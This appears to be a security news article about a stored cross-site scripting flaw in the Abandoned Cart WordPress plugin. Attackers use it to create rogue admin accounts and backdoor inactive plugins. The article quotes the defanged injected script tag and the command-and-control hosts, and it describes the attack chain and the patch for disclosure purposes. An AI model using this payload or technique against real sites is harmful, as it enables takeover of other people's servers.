Online shopping has the convenience of collecting items and dispensing personal judgement on the things you like and the things you don’t. All this without having the effort of hauling those things around a labyrinth of smells and sounds! And with the Abandoned Cart plugin for WordPress sites, the site administrator can hold on to your cart in case you have a desire to pick up where you left off if a sudden pressing matter arises, or you simply lose interest for the time being. But WordFence security researchers have noticed a flaw in the execution of the Abandoned Cart plugin which enables a complete site takeover along with laying a secondary backdoor to regain access in case of discovery.
The Abandoned Cart plugin had a distinct lack of sanitation on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard. The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>“ as the billing_last_name field. The URL points to a Command control server, “hXXps://cdn-bigcommerce[.]com/ visionstat.js” which contains a malicious JavaScript payload.
The attacker first uses the victim’s browser session to make trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the invasion occurring. The first action taken is creating an administrative user for the site to which the attacker has the credentials. Who needs a backdoor, when you create keys to the front door for yourself? The user to these clandestine accounts has consistently been found to be “woouser” with a “woouser” email at mailinator, a free disposable email. The malicious JavaScript then infects an inactive plugin with a malicious script that still listens for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server and a confirmation email is sent to the mailinator address to confirm the administrator account.
A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<“ and any account with “woouser” in the email. While this prevents the initial attack from creating adversary controlled accounts, it doesn’t address the code injection in the deactivated plugins.